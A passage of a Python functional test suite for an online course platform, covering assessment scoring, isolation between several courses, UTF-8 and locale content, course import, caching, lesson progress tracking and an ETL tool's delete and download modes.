student = models.Student.get_enrolled_student_by_email(email)
student_scores = course.get_all_scores(student)
assert len(student_scores) == 4
for assessment in student_scores:
if assessment['id'] == 'Pre':
assert assessment['score'] > 0
else:
assert assessment['score'] == 0
actions.submit_assessment(self, 'Mid', mid)
student = models.Student.get_enrolled_student_by_email(email)
# Navigate to the course overview page.
response = self.get('course')
assert_equals(response.status_int, 200)
assert_contains(u'id="progress-completed-Pre', response.body)
assert_contains(u'id="progress-completed-Mid', response.body)
assert_contains(u'id="progress-notstarted-Fin', response.body)
# Submit the final assessment.
actions.submit_assessment(self, 'Fin', fin)
student = models.Student.get_enrolled_student_by_email(email)
# Submit the sample peer review assessment.
actions.submit_assessment(self, 'ReviewAssessmentExample', peer)
student_scores = course.get_all_scores(student)
# This assessment is not considered to be completed until enough
# peer reviews have been submitted.
for assessment in student_scores:
if assessment['id'] == 'ReviewAssessmentExample':
assert assessment['human_graded']
assert not assessment['completed']
# Navigate to the course overview page.
response = self.get('course')
assert_equals(response.status_int, 200)
assert_contains(u'id="progress-completed-Fin', response.body)
# Check that the overall-score is non-zero.
assert course.get_overall_score(student)
# Check assessment answers.
answers = transforms.loads(
models.StudentAnswersEntity.get_by_key_name(
student.user_id).data)
assert pre_answers == answers['Pre']
# pylint: disable-msg=g-explicit-bool-comparison
assert [] == answers['Mid']
assert [] == answers['Fin']
# pylint: enable-msg=g-explicit-bool-comparison
# Check that scores are recorded properly.
student = models.Student.get_enrolled_student_by_email(email)
assert int(course.get_score(student, 'Pre')) == 1
assert int(course.get_score(student, 'Mid')) == 2
assert int(course.get_score(student, 'Fin')) == 3
assert (int(course.get_overall_score(student)) ==
int((0.30 * 2) + (0.70 * 3)))
# Try posting a new midcourse exam with a lower score;
# nothing should change.
actions.submit_assessment(self, 'Mid', second_mid)
student = models.Student.get_enrolled_student_by_email(email)
assert int(course.get_score(student, 'Pre')) == 1
assert int(course.get_score(student, 'Mid')) == 2
assert int(course.get_score(student, 'Fin')) == 3
assert (int(course.get_overall_score(student)) ==
int((0.30 * 2) + (0.70 * 3)))
# Now try posting a postcourse exam with a higher score and note
# the changes.
actions.submit_assessment(self, 'Fin', second_fin)
student = models.Student.get_enrolled_student_by_email(email)
assert int(course.get_score(student, 'Pre')) == 1
assert int(course.get_score(student, 'Mid')) == 2
assert int(course.get_score(student, 'Fin')) == 100000
assert (int(course.get_overall_score(student)) ==
int((0.30 * 2) + (0.70 * 100000)))
finally:
namespace_manager.set_namespace(old_namespace)
def remove_dir(dir_name):
"""Delete a directory."""
logging.info('removing folder: %s', dir_name)
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
if os.path.exists(dir_name):
raise Exception('Failed to delete directory: %s' % dir_name)
def clean_dir(dir_name):
"""Clean a directory."""
remove_dir(dir_name)
logging.info('creating folder: %s', dir_name)
os.makedirs(dir_name)
if not os.path.exists(dir_name):
raise Exception('Failed to create directory: %s' % dir_name)
def clone_canonical_course_data(src, dst):
"""Makes a copy of canonical course content."""
clean_dir(dst)
def copytree(name):
shutil.copytree(
os.path.join(src, name),
os.path.join(dst, name))
copytree('assets')
copytree('data')
copytree('views')
shutil.copy(
os.path.join(src, 'course.yaml'),
os.path.join(dst, 'course.yaml'))
# Make all files writable.
for root, unused_dirs, files in os.walk(dst):
for afile in files:
fname = os.path.join(root, afile)
os.chmod(fname, 0o777)
class GeneratedCourse(object):
"""A helper class for a dynamically generated course content."""
@classmethod
def set_data_home(cls, test):
"""All data for this test will be placed here."""
cls.data_home = test.test_tempdir
def __init__(self, ns):
self.path = ns
@property
def namespace(self):
return 'ns%s' % self.path
@property
def title(self):
return u'Power Searching with Google title-%s (тест данные)' % self.path
@property
def unit_title(self):
return u'Interpreting results unit-title-%s (тест данные)' % self.path
@property
def lesson_title(self):
return u'Word order matters lesson-title-%s (тест данные)' % self.path
@property
def head(self):
return '<!-- head-%s -->' % self.path
@property
def css(self):
return '<!-- css-%s -->' % self.path
@property
def home(self):
return os.path.join(self.data_home, 'data-%s' % self.path)
@property
def email(self):
return 'walk_the_course_named_%s@google.com' % self.path
@property
def name(self):
return 'Walk The Course Named %s' % self.path
class MultipleCoursesTestBase(actions.TestBase):
"""Configures several courses for running concurrently."""
def modify_file(self, filename, find, replace):
"""Read, modify and write back the file."""
text = open(filename, 'r').read().decode('utf-8')
# Make sure target text is not in the file.
assert replace not in text
text = text.replace(find, replace)
assert replace in text
open(filename, 'w').write(text.encode('utf-8'))
def modify_canonical_course_data(self, course):
"""Modify canonical content by adding unique bits to it."""
self.modify_file(
os.path.join(course.home, 'course.yaml'),
'title: \'Power Searching with Google\'',
'title: \'%s\'' % course.title)
self.modify_file(
os.path.join(course.home, 'data/unit.csv'),
',Interpreting results,',
',%s,' % course.unit_title)
self.modify_file(
os.path.join(course.home, 'data/lesson.csv'),
',Word order matters,',
',%s,' % course.lesson_title)
self.modify_file(
os.path.join(course.home, 'data/lesson.csv'),
',Interpreting results,',
',%s,' % course.unit_title)
self.modify_file(
os.path.join(course.home, 'views/base.html'),
'<head>',
'<head>\n%s' % course.head)
self.modify_file(
os.path.join(course.home, 'assets/css/main.css'),
'html {',
'%s\nhtml {' % course.css)
def prepare_course_data(self, course):
"""Create unique course content for a course."""
clone_canonical_course_data(self.bundle_root, course.home)
self.modify_canonical_course_data(course)
def setUp(self): # pylint: disable-msg=g-bad-name
"""Configure the test."""
super(MultipleCoursesTestBase, self).setUp()
GeneratedCourse.set_data_home(self)
self.course_a = GeneratedCourse('a')
self.course_b = GeneratedCourse('b')
self.course_ru = GeneratedCourse('ru')
# Override BUNDLE_ROOT.
self.bundle_root = appengine_config.BUNDLE_ROOT
appengine_config.BUNDLE_ROOT = GeneratedCourse.data_home
# Prepare course content.
clean_dir(GeneratedCourse.data_home)
self.prepare_course_data(self.course_a)
self.prepare_course_data(self.course_b)
self.prepare_course_data(self.course_ru)
# Setup one course for I18N.
self.modify_file(
os.path.join(self.course_ru.home, 'course.yaml'),
'locale: \'en_US\'',
'locale: \'no_NO\'')
# Configure courses.
sites.setup_courses('%s, %s, %s' % (
'course:/courses/a:/data-a:nsa',
'course:/courses/b:/data-b:nsb',
'course:/courses/ru:/data-ru:nsru'))
def tearDown(self): # pylint: disable-msg=g-bad-name
"""Clean up."""
sites.reset_courses()
appengine_config.BUNDLE_ROOT = self.bundle_root
super(MultipleCoursesTestBase, self).tearDown()
def walk_the_course(
self, course, first_time=True, is_admin=False, logout=True):
"""Visit a course as a Student would."""
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
# Check normal user has no access.
actions.login(course.email, is_admin=is_admin)
# Test schedule.
if first_time:
response = self.testapp.get('/courses/%s/preview' % course.path)
else:
response = self.testapp.get('/courses/%s/course' % course.path)
assert_contains(course.title, response.body)
assert_contains(course.unit_title, response.body)
assert_contains(course.head, response.body)
# Tests static resource.
response = self.testapp.get(
'/courses/%s/assets/css/main.css' % course.path)
assert_contains(course.css, response.body)
if first_time:
# Test registration.
response = self.get('/courses/%s/register' % course.path)
assert_contains(course.title, response.body)
assert_contains(course.head, response.body)
register_form = actions.get_form_by_action(response, 'register')
register_form.set('form01', course.name)
register_form.action = '/courses/%s/register' % course.path
response = self.submit(register_form)
assert_equals(response.status_int, 302)
assert_contains(
'course#registration_confirmation', response.headers[
'location'])
# Check lesson page.
response = self.testapp.get(
'/courses/%s/unit?unit=1&lesson=5' % course.path)
assert_contains(course.title, response.body)
assert_contains(course.lesson_title, response.body)
assert_contains(course.head, response.body)
# Check activity page.
response = self.testapp.get(
'/courses/%s/activity?unit=1&lesson=5' % course.path)
assert_contains(course.title, response.body)
assert_contains(course.lesson_title, response.body)
assert_contains(course.head, response.body)
if logout:
actions.logout()
# Clean up.
sites.ApplicationContext.get_environ = get_environ_old
class MultipleCoursesTest(MultipleCoursesTestBase):
"""Test several courses running concurrently."""
def test_courses_are_isolated(self):
"""Test each course serves its own assets, views and data."""
# Pretend students visit courses.
self.walk_the_course(self.course_a)
self.walk_the_course(self.course_b)
self.walk_the_course(self.course_a, first_time=False)
self.walk_the_course(self.course_b, first_time=False)
# Check course namespaced data.
self.validate_course_data(self.course_a)
self.validate_course_data(self.course_b)
# Check default namespace.
assert (
namespace_manager.get_namespace() ==
appengine_config.DEFAULT_NAMESPACE_NAME)
assert not models.Student.all().fetch(1000)
def validate_course_data(self, course):
"""Check course data is valid."""
old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace(course.namespace)
try:
students = models.Student.all().fetch(1000)
assert len(students) == 1
for student in students:
assert_equals(course.email, student.key().name())
assert_equals(course.name, student.name)
finally:
namespace_manager.set_namespace(old_namespace)
class I18NTest(MultipleCoursesTestBase):
"""Test courses running in different locales and containing I18N content."""
def test_csv_supports_utf8(self):
"""Test UTF-8 content in CSV file is handled correctly."""
title_ru = u'Найди факты быстрее'
csv_file = os.path.join(self.course_ru.home, 'data/unit.csv')
self.modify_file(
csv_file, ',Find facts faster,', ',%s,' % title_ru)
self.modify_file(
os.path.join(self.course_ru.home, 'data/lesson.csv'),
',Find facts faster,', ',%s,' % title_ru)
rows = []
for row in csv.reader(open(csv_file)):
rows.append(row)
assert title_ru == rows[6][3].decode('utf-8')
response = self.get('/courses/%s/course' % self.course_ru.path)
assert_contains(title_ru, response.body)
# Tests student perspective.
self.walk_the_course(self.course_ru, first_time=True)
self.walk_the_course(self.course_ru, first_time=False)
# Test course author dashboard.
self.walk_the_course(
self.course_ru, first_time=False, is_admin=True, logout=False)
def assert_page_contains(page_name, text_array):
dashboard_url = '/courses/%s/dashboard' % self.course_ru.path
response = self.get('%s?action=%s' % (dashboard_url, page_name))
for text in text_array:
assert_contains(text, response.body)
assert_page_contains('', [
title_ru, self.course_ru.unit_title, self.course_ru.lesson_title])
assert_page_contains(
'assets', [self.course_ru.title])
assert_page_contains(
'settings', [
self.course_ru.title,
vfs.AbstractFileSystem.normpath(self.course_ru.home)])
# Clean up.
actions.logout()
def test_i18n(self):
"""Test course is properly internationalized."""
response = self.get('/courses/%s/course' % self.course_ru.path)
assert_contains_all_of(
[u'Войти', u'Расписание', u'Курс'], response.body)
class CourseUrlRewritingTestBase(actions.TestBase):
"""Prepare course for using rewrite rules and '/courses/pswg' base URL."""
def setUp(self): # pylint: disable-msg=g-bad-name
super(CourseUrlRewritingTestBase, self).setUp()
self.base = '/courses/pswg'
self.namespace = 'gcb-courses-pswg-tests-ns'
sites.setup_courses('course:%s:/:%s' % (self.base, self.namespace))
def tearDown(self): # pylint: disable-msg=g-bad-name
sites.reset_courses()
super(CourseUrlRewritingTestBase, self).tearDown()
def canonicalize(self, href, response=None):
"""Canonicalize URL's using either <base> or self.base."""
# Check if already canonicalized.
if href.startswith(
self.base) or utils.ApplicationHandler.is_absolute(href):
pass
else:
# Look for <base> tag in the response to compute the canonical URL.
if response:
return super(CourseUrlRewritingTestBase, self).canonicalize(
href, response)
# Prepend self.base to compute the canonical URL.
if not href.startswith('/'):
href = '/%s' % href
href = '%s%s' % (self.base, href)
self.audit_url(href)
return href
class VirtualFileSystemTestBase(actions.TestBase):
"""Prepares a course running on a virtual local file system."""
def setUp(self): # pylint: disable-msg=g-bad-name
"""Configure the test."""
super(VirtualFileSystemTestBase, self).setUp()
GeneratedCourse.set_data_home(self)
# Override BUNDLE_ROOT.
self.bundle_root = appengine_config.BUNDLE_ROOT
appengine_config.BUNDLE_ROOT = GeneratedCourse.data_home
# Prepare course content.
home_folder = os.path.join(GeneratedCourse.data_home, 'data-v')
clone_canonical_course_data(self.bundle_root, home_folder)
# Configure course.
self.namespace = 'nsv'
sites.setup_courses('course:/:/data-vfs:%s' % self.namespace)
# Modify app_context filesystem to map /data-v to /data-vfs.
def after_create(unused_cls, instance):
# pylint: disable-msg=protected-access
instance._fs = vfs.AbstractFileSystem(
vfs.LocalReadOnlyFileSystem(
os.path.join(GeneratedCourse.data_home, 'data-vfs'),
home_folder))
sites.ApplicationContext.after_create = after_create
def tearDown(self): # pylint: disable-msg=g-bad-name
"""Clean up."""
sites.reset_courses()
appengine_config.BUNDLE_ROOT = self.bundle_root
super(VirtualFileSystemTestBase, self).tearDown()
class DatastoreBackedCourseTest(actions.TestBase):
"""Prepares an empty course running on datastore-backed file system."""
def setUp(self): # pylint: disable-msg=g-bad-name
"""Configure the test."""
super(DatastoreBackedCourseTest, self).setUp()
self.supports_editing = True
self.namespace = 'dsbfs'
sites.setup_courses('course:/::%s' % self.namespace)
all_courses = sites.get_all_courses()
assert len(all_courses) == 1
self.app_context = all_courses[0]
def tearDown(self): # pylint: disable-msg=g-bad-name
"""Clean up."""
sites.reset_courses()
super(DatastoreBackedCourseTest, self).tearDown()
def upload_all_in_dir(self, dir_name, files_added):
"""Uploads all files in a folder to vfs."""
root_dir = os.path.join(appengine_config.BUNDLE_ROOT, dir_name)
for root, unused_dirs, files in os.walk(root_dir):
for afile in files:
filename = os.path.join(root, afile)
self.app_context.fs.put(filename, open(filename, 'rb'))
files_added.append(filename)
def init_course_data(self, upload_files):
"""Uploads required course data files into vfs."""
files_added = []
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(self.namespace)
upload_files(files_added)
# Normalize paths to be identical for Windows and Linux.
files_added_normpath = []
for file_added in files_added:
files_added_normpath.append(
vfs.AbstractFileSystem.normpath(file_added))
assert self.app_context.fs.list(
appengine_config.BUNDLE_ROOT) == sorted(files_added_normpath)
finally:
namespace_manager.set_namespace(old_namespace)
def upload_all_sample_course_files(self, files_added):
"""Uploads all sample course data files into vfs."""
self.upload_all_in_dir('assets', files_added)
self.upload_all_in_dir('views', files_added)
self.upload_all_in_dir('data', files_added)
course_yaml = os.path.join(
appengine_config.BUNDLE_ROOT, 'course.yaml')
self.app_context.fs.put(course_yaml, open(course_yaml, 'rb'))
files_added.append(course_yaml)
class DatastoreBackedCustomCourseTest(DatastoreBackedCourseTest):
"""Prepares a sample course running on datastore-backed file system."""
def test_course_import(self):
"""Test importing of the course."""
# Setup courses.
sites.setup_courses('course:/test::ns_test, course:/:/')
self.namespace = 'ns_test'
self.base = '/test'
config.Registry.test_overrides[models.CAN_USE_MEMCACHE.name] = True
# Format import payload and URL.
payload_dict = {}
payload_dict['course'] = 'course:/:/'
request = {}
request['payload'] = transforms.dumps(payload_dict)
import_put_url = (
'rest/course/import?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}))
# Check non-logged user has no rights.
response = self.put(import_put_url, {}, expect_errors=True)
assert_equals(404, response.status_int)
# Login as admin.
email = 'test_course_import@google.com'
name = 'Test Course Import'
actions.login(email, is_admin=True)
# Check course is empty.
response = self.get('dashboard')
assert_equals(200, response.status_int)
assert_does_not_contain('Filter image results by color', response.body)
# Import sample course.
request[
'xsrf_token'] = XsrfTokenManager.create_xsrf_token('import-course')
import_put_url = (
'rest/course/import?%s' % urllib.urlencode(
{'request': transforms.dumps(request)}))
response = self.put(import_put_url, {})
assert_equals(200, response.status_int)
assert_contains('Imported.', response.body)
# Check course is not empty.
response = self.get('dashboard')
assert_contains('Filter image results by color', response.body)
# Check assessment is copied.
response = self.get('assets/js/assessment-21.js')
assert_equals(200, response.status_int)
assert_contains('Humane Society website', response.body)
# Check activity is copied.
response = self.get('assets/js/activity-37.js')
assert_equals(200, response.status_int)
assert_contains('explore ways to keep yourself updated', response.body)
unit_2_title = 'Unit 2 - Interpreting results'
lesson_2_1_title = '2.1 When search results suggest something new'
lesson_2_2_title = '2.2 Thinking more deeply about your search'
# Check units and lessons are indexed correctly.
response = actions.register(self, name)
assert (
'http://localhost'
'/test/course'
'#registration_confirmation' == response.location)
response = self.get('course')
assert_contains(unit_2_title, response.body)
# Unit page.
response = self.get('unit?unit=9')
assert_contains( # A unit title.
unit_2_title, response.body)
assert_contains( # First child lesson without link.
lesson_2_1_title, response.body)
assert_contains( # Second child lesson with link.
lesson_2_2_title, response.body)
assert_contains_all_of( # Breadcrumbs.
['Unit 2</a></li>', 'Lesson 1</li>'], response.body)
# Unit page.
response = self.get('activity?unit=9&lesson=10')
assert_contains( # A unit title.
unit_2_title, response.body)
assert_contains( # An activity title.
'Lesson 2.1 Activity', response.body)
assert_contains( # First child lesson without link.
lesson_2_1_title, response.body)
assert_contains( # Second child lesson with link.
lesson_2_2_title, response.body)
assert_contains_all_of( # Breadcrumbs.
['Unit 2</a></li>', 'Lesson 1</a></li>'], response.body)
# Clean up.
sites.reset_courses()
config.Registry.test_overrides = {}
def test_get_put_file(self):
"""Test that one can put/get file via REST interface."""
self.init_course_data(self.upload_all_sample_course_files)
email = 'test_get_put_file@google.com'
actions.login(email, is_admin=True)
response = self.get('dashboard?action=settings')
# Check course.yaml edit form.
compute_form = response.forms['edit_course_yaml']
response = self.submit(compute_form)
assert_equals(response.status_int, 302)
assert_contains(
'dashboard?action=edit_settings&key=%2Fcourse.yaml',
response.location)
response = self.get(response.location)
assert_contains('rest/files/item?key=%2Fcourse.yaml', response.body)
# Get text file.
response = self.get('rest/files/item?key=%2Fcourse.yaml')
assert_equals(response.status_int, 200)
json_dict = transforms.loads(
transforms.loads(response.body)['payload'])
assert '/course.yaml' == json_dict['key']
assert 'text/utf-8' == json_dict['encoding']
assert (open(os.path.join(
appengine_config.BUNDLE_ROOT, 'course.yaml')).read(
) == json_dict['content'])
def test_empty_course(self):
"""Test course with no assets and the simplest possible course.yaml."""
email = 'test_empty_course@google.com'
actions.login(email, is_admin=True)
# Check minimal course page comes up.
response = self.get('course')
assert_contains('UNTITLED COURSE', response.body)
assert_contains('Registration', response.body)
# Check inheritable files are accessible.
response = self.get('/assets/css/main.css')
assert (open(os.path.join(
appengine_config.BUNDLE_ROOT, 'assets/css/main.css')).read(
) == response.body)
# Check non-inheritable files are not inherited.
response = self.testapp.get(
'/assets/js/activity-1.3.js', expect_errors=True)
assert_equals(response.status_int, 404)
# Login as admin.
email = 'test_empty_course@google.com'
actions.login(email, is_admin=True)
response = self.get('dashboard')
# Add unit.
compute_form = response.forms['add_unit']
response = self.submit(compute_form)
response = self.get('/rest/course/unit?key=1')
assert_equals(response.status_int, 200)
# Add lessons.
response = self.get('dashboard')
compute_form = response.forms['add_lesson']
response = self.submit(compute_form)
response = self.get('/rest/course/lesson?key=2')
assert_equals(response.status_int, 200)
# Add assessment.
response = self.get('dashboard')
compute_form = response.forms['add_assessment']
response = self.submit(compute_form)
response = self.get('/rest/course/assessment?key=3')
assert_equals(response.status_int, 200)
# Add link.
response = self.get('dashboard')
compute_form = response.forms['add_link']
response = self.submit(compute_form)
response = self.get('/rest/course/link?key=4')
assert_equals(response.status_int, 200)
def import_sample_course(self):
"""Imports a sample course."""
# Setup courses.
sites.setup_courses('course:/test::ns_test, course:/:/')
# Import sample course.
dst_app_context = sites.get_all_courses()[0]
src_app_context = sites.get_all_courses()[1]
dst_course = courses.Course(None, app_context=dst_app_context)
errors = []
src_course_out, dst_course_out = dst_course.import_from(
src_app_context, errors)
if errors:
raise Exception(errors)
assert len(
src_course_out.get_units()) == len(dst_course_out.get_units())
dst_course_out.save()
# Clean up.
sites.reset_courses()
def test_imported_course_performance(self):
"""Tests various pages of the imported course."""
self.import_sample_course()
# Install a clone on the '/' so all the tests will treat it as normal
# sample course.
sites.setup_courses('course:/::ns_test')
self.namespace = 'ns_test'
# Enable memcache.
config.Registry.test_overrides[
models.CAN_USE_MEMCACHE.name] = True
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['now_available'] = True
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
def custom_inc(unused_increment=1, context=None):
"""A custom inc() function for cache miss counter."""
self.keys.append(context)
self.count += 1
def assert_cached(url, assert_text, cache_miss_allowed=0):
"""Checks that specific URL supports caching."""
memcache.flush_all()
self.keys = []
self.count = 0
# Expect cache misses first time we load page.
cache_miss_before = self.count
response = self.get(url)
assert_contains(assert_text, response.body)
assert cache_miss_before != self.count
# Expect no cache misses first time we load page.
self.keys = []
cache_miss_before = self.count
response = self.get(url)
assert_contains(assert_text, response.body)
cache_miss_actual = self.count - cache_miss_before
if cache_miss_actual != cache_miss_allowed:
raise Exception(
'Expected %s cache misses, got %s. Keys are:\n%s' % (
cache_miss_allowed, cache_miss_actual,
'\n'.join(self.keys)))
old_inc = models.CACHE_MISS.inc
models.CACHE_MISS.inc = custom_inc
# Walk the site.
email = 'test_units_lessons@google.com'
name = 'Test Units Lessons'
assert_cached('preview', 'Putting it all together')
actions.login(email, is_admin=True)
assert_cached('preview', 'Putting it all together')
actions.register(self, name)
assert_cached(
'unit?unit=9', 'When search results suggest something new')
assert_cached(
'unit?unit=9&lesson=12', 'Understand options for different media')
# Clean up.
models.CACHE_MISS.inc = old_inc
sites.ApplicationContext.get_environ = get_environ_old
config.Registry.test_overrides = {}
sites.reset_courses()
def test_imported_course(self):
"""Tests various pages of the imported course."""
# TODO(psimakov): Ideally, this test class should run all aspect tests
# and they all should pass. However, the id's in the cloned course
# do not match the id's of source sample course and we fetch pages
# and assert page content using id's. For now, we will check the minimal
# set of pages manually. Later, we have to make it run all known tests.
self.import_sample_course()
# Install a clone on the '/' so all the tests will treat it as normal
# sample course.
sites.setup_courses('course:/::ns_test')
self.namespace = 'ns_test'
email = 'test_units_lessons@google.com'
name = 'Test Units Lessons'
actions.login(email, is_admin=True)
response = self.get('course')
assert_contains('Putting it all together', response.body)
actions.register(self, name)
actions.check_profile(self, name)
actions.view_announcements(self)
# Check unit page without lesson specified.
response = self.get('unit?unit=9')
assert_contains('Interpreting results', response.body)
assert_contains(
'When search results suggest something new', response.body)
# Check unit page with a lessons.
response = self.get('unit?unit=9&lesson=12')
assert_contains('Interpreting results', response.body)
assert_contains(
'Understand options for different media', response.body)
# Check assesment page.
response = self.get('assessment?name=21')
assert_contains(
'<script src="assets/js/assessment-21.js"></script>', response.body)
# Check activity page.
response = self.get('activity?unit=9&lesson=13')
assert_contains(
'<script src="assets/js/activity-13.js"></script>',
response.body)
# Clean up.
sites.reset_courses()
class DatastoreBackedSampleCourseTest(DatastoreBackedCourseTest):
"""Run all existing tests using datastore-backed file system."""
def setUp(self): # pylint: disable-msg=g-bad-name
super(DatastoreBackedSampleCourseTest, self).setUp()
self.init_course_data(self.upload_all_sample_course_files)
class LessonComponentsTest(DatastoreBackedCourseTest):
"""Test operations that make use of components in a lesson body."""
def setUp(self):
"""Set up the dummy course for each test case in this class."""
super(LessonComponentsTest, self).setUp()
self.course = courses.Course(None, app_context=self.app_context)
self.unit = self.course.add_unit()
self.lesson = self.course.add_lesson(self.unit)
self.lesson.objectives = """
<question quid="123" weight="1" instanceid="QN"></question>
random_text
<gcb-youtube videoid="Kdg2drcUjYI" instanceid="VD"></gcb-youtube>
more_random_text
<question-group qgid="456" instanceid="QG"></question-group>
yet_more_random_text
"""
self.lesson.has_activity = False
self.course.update_lesson(self.lesson)
self.course.save()
self.tracker = self.course.get_progress_tracker()
def test_component_discovery(self):
"""Test extraction of components from a lesson body."""
cpt_list = self.course.get_components(
self.unit.unit_id, self.lesson.lesson_id)
assert cpt_list == [
{'instanceid': 'QN', 'quid': '123', 'weight': '1',
'cpt_name': 'question'},
{'instanceid': 'VD', 'cpt_name': 'gcb-youtube',
'videoid': 'Kdg2drcUjYI'},
{'instanceid': 'QG', 'qgid': '456', 'cpt_name': 'question-group'}
]
valid_cpt_ids = self.tracker.get_valid_component_ids(
self.unit.unit_id, self.lesson.lesson_id)
assert valid_cpt_ids == ['QN', 'QG']
def test_component_progress(self):
"""Test that progress tracking for components is done correctly."""
unit_id = self.unit.unit_id
lesson_id = self.lesson.lesson_id
student = models.Student(key_name='lesson-body-test-student')
assert self.tracker.get_unit_progress(student)[unit_id] == 0
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
# Visiting the lesson page has no effect on progress, since it contains
# trackable components.
self.tracker.put_html_accessed(student, unit_id, lesson_id)
assert self.tracker.get_unit_progress(student)[unit_id] == 0
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
# Marking progress for a non-existent component id has no effect.
self.tracker.put_component_completed(student, unit_id, lesson_id, 'a')
assert self.tracker.get_unit_progress(student)[unit_id] == 0
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
# Marking progress for a non-trackable component id has no effect.
self.tracker.put_component_completed(student, unit_id, lesson_id, 'VD')
assert self.tracker.get_unit_progress(student)[unit_id] == 0
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
# Completing a trackable component marks the lesson as in-progress,
self.tracker.put_component_completed(student, unit_id, lesson_id, 'QN')
assert self.tracker.get_unit_progress(student)[unit_id] == 1
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 1, 'activity': 0}
# Completing the same component again has no further effect.
self.tracker.put_component_completed(student, unit_id, lesson_id, 'QN')
assert self.tracker.get_unit_progress(student)[unit_id] == 1
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 1, 'activity': 0}
# Completing the other trackable component marks the lesson (and unit)
# as completed.
self.tracker.put_component_completed(student, unit_id, lesson_id, 'QG')
assert self.tracker.get_unit_progress(student)[unit_id] == 2
assert self.tracker.get_lesson_progress(
student, unit_id)[lesson_id] == {'html': 2, 'activity': 0}
class FakeEnvironment(object):
"""Temporary fake tools.etl.remote.Evironment.
Bypasses making a remote_api connection because webtest can't handle it and
we don't want to bring up a local server for our functional tests. When this
fake is used, the in-process datastore stub will handle RPCs.
TODO(johncox): find a way to make webtest successfully emulate the
remote_api endpoint and get rid of this fake.
"""
def __init__(self, application_id, server, path=None):
self._appication_id = application_id
self._path = path
self._server = server
def establish(self):
pass
class EtlMainTestCase(DatastoreBackedCourseTest):
"""Tests tools/etl/etl.py's main()."""
# Allow access to protected members under test.
# pylint: disable-msg=protected-access
def setUp(self):
"""Configures EtlMainTestCase."""
super(EtlMainTestCase, self).setUp()
self.test_environ = copy.deepcopy(os.environ)
# In etl.main, use test auth scheme to avoid interactive login.
self.test_environ['SERVER_SOFTWARE'] = remote.TEST_SERVER_SOFTWARE
self.archive_path = os.path.join(self.test_tempdir, 'archive.zip')
self.new_course_title = 'New Course Title'
self.url_prefix = '/test'
self.raw = 'course:%s::ns_test' % self.url_prefix
self.swap(os, 'environ', self.test_environ)
self.common_args = [
self.url_prefix, 'myapp', 'localhost:8080']
self.common_command_args = self.common_args + [
'--archive_path', self.archive_path]
self.common_course_args = [etl._TYPE_COURSE] + self.common_command_args
self.common_datastore_args = [
etl._TYPE_DATASTORE] + self.common_command_args
self.delete_datastore_args = etl.PARSER.parse_args(
[etl._MODE_DELETE, etl._TYPE_DATASTORE] + self.common_args)
self.download_course_args = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_course_args)
self.upload_course_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_course_args)
# Set up courses: version 1.3, version 1.2.
sites.setup_courses(self.raw + ', course:/:/')
def tearDown(self):
sites.reset_courses()
super(EtlMainTestCase, self).tearDown()
def create_app_yaml(self, context, title=None):
yaml = copy.deepcopy(courses.DEFAULT_COURSE_YAML_DICT)
if title:
yaml['course']['title'] = title
context.fs.impl.put(
os.path.join(
appengine_config.BUNDLE_ROOT, etl._COURSE_YAML_PATH_SUFFIX),
etl._ReadWrapper(str(yaml)), is_draft=False)
def create_archive(self):
self.upload_all_sample_course_files([])
self.import_sample_course()
args = etl.PARSER.parse_args(['download'] + self.common_course_args)
etl.main(args, environment_class=FakeEnvironment)
sites.reset_courses()
def create_empty_course(self, raw):
sites.setup_courses(raw)
context = etl_lib.get_context(self.url_prefix)
course = etl._get_course_from(etl_lib.get_context(self.url_prefix))
course.delete_all()
self.create_app_yaml(context)
def import_sample_course(self):
"""Imports a sample course."""
# Import sample course.
dst_app_context = sites.get_all_courses()[0]
src_app_context = sites.get_all_courses()[1]
# Patch in a course.yaml.
self.create_app_yaml(dst_app_context, title=self.new_course_title)
dst_course = courses.Course(None, app_context=dst_app_context)
errors = []
src_course_out, dst_course_out = dst_course.import_from(
src_app_context, errors)
if errors:
raise Exception(errors)
assert len(
src_course_out.get_units()) == len(dst_course_out.get_units())
dst_course_out.save()
def test_delete_course_fails(self):
args = etl.PARSER.parse_args(
[etl._MODE_DELETE, etl._TYPE_COURSE] + self.common_args)
self.assertRaises(
NotImplementedError,
etl.main, args, environment_class=FakeEnvironment)
def test_delete_datastore_fails_if_user_does_not_confirm(self):
self.swap(
etl, '_raw_input',
lambda x: 'not' + etl._DELETE_DATASTORE_CONFIRMATION_INPUT)
self.assertRaises(
SystemExit, etl.main, self.delete_datastore_args,
environment_class=FakeEnvironment)
def test_delete_datastore_succeeds(self):
"""Tests delete datastore success for populated and empty datastores."""
self.import_sample_course()
context = etl_lib.get_context(
self.delete_datastore_args.course_url_prefix)
self.swap(
etl, '_raw_input',
lambda x: etl._DELETE_DATASTORE_CONFIRMATION_INPUT)
# Spot check that some kinds are populated.
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(context.get_namespace_name())
self.assertTrue(vfs.FileDataEntity.all().get())
self.assertTrue(vfs.FileMetadataEntity.all().get())
finally:
namespace_manager.set_namespace(old_namespace)
# Delete against a datastore with contents runs successfully.
etl.main(self.delete_datastore_args, environment_class=FakeEnvironment)
# Spot check that those kinds are now empty.
try:
namespace_manager.set_namespace(context.get_namespace_name())
self.assertFalse(vfs.FileDataEntity.all().get())
self.assertFalse(vfs.FileMetadataEntity.all().get())
finally:
